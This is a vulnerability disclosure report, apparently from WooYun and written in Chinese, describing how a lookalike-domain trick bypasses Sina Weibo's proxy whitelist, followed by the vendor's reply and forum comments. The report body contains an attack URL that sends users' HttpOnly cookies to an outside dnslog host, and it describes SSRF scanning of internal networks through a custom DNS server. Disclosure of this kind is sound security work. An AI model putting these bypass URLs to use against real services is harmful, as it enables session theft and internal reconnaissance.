新浪微博某漏洞修复不当可XSS/盗取用户httponly cookie

http://www.weibo.com/p/aj/proxy?api=url

见 @呆子不开口 之前发的 WooYun: 微博上你点我的链接我就可xss你并可拿到httponly的cookie及其他危害

官方修复了之后， http:/wb.php之类的url已经不行了，但使用http://contentrecommend.mobile.sina.cn.fakedomain.com 这样的url可以绕过白名单限制。

此处可以ssrf探测内网的，刚开始的时候还支持302跳转的，但测着测着就发现不行了，可能被发现然后修复了。虽然不能跳转了，但我们可以自己搭建个简易dns服务器，动态返回内网的ip，这样任可以扫描内网。

http://www.weibo.com/p/aj/proxy?api=http://contentrecommend.mobile.sina.cn.****.dnslog.info/

cloudeye 收到的请求:

cookies全送过来了。

完善白名单规则

厂商回应：

危害等级：中

漏洞Rank：8

确认时间：2016-04-06 16:32

厂商回复：

感谢关注新浪安全，问题修复中。

最新状态：

暂无

1. 2016-04-02 17:41 | 坏男孩-A_A ( 实习白帽子 | 还没有发布任何漏洞 | 膜拜学习中)

   1

   出来利用新姿势了么？出来好多修复不当了

   1# 回复此人

2. 2016-04-02 17:44 | 随风的风 ( 普通白帽子 | Rank:259 漏洞数:22 | 微信公众号：233sec 不定期分享各种漏洞思...)

   2

   关注。。

   2# 回复此人

3. 2016-04-02 18:08 | Mark0smith ( 普通白帽子 | Rank:176 漏洞数:24 )

   1

   66666

   3# 回复此人

4. 2016-04-02 18:23 | U神 ( 核心白帽子 | Rank:1375 漏洞数:94 | 乌云核心菜鸟，此号长期由联盟托管，如果近...)

   1

   我擦。

   4# 回复此人

5. 2016-04-02 20:32 | 我叫金挖挖 ( 路人 | Rank:15 漏洞数:5 | 一个搞电力的业余玩家)

   1

   捡漏也是一门学问

   5# 回复此人

6. 2016-04-02 23:00 | sqlfeng ( 普通白帽子 | Rank:721 漏洞数:79 | 江山父老能容我,不使人间造孽钱)

   1

   新浪最近漏洞高爆发啊

   6# 回复此人

7. 2016-04-02 23:44 | 牛肉包子 ( 普通白帽子 | Rank:307 漏洞数:60 | baozisec)

   1

   默默关注loopx9师傅

   7# 回复此人